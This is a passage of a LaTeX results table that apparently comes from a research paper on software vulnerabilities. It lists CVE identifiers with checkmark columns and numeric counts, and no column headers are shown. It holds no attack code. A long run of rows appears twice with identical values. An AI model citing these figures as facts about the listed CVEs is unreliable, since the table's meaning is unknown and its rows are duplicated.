/checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & 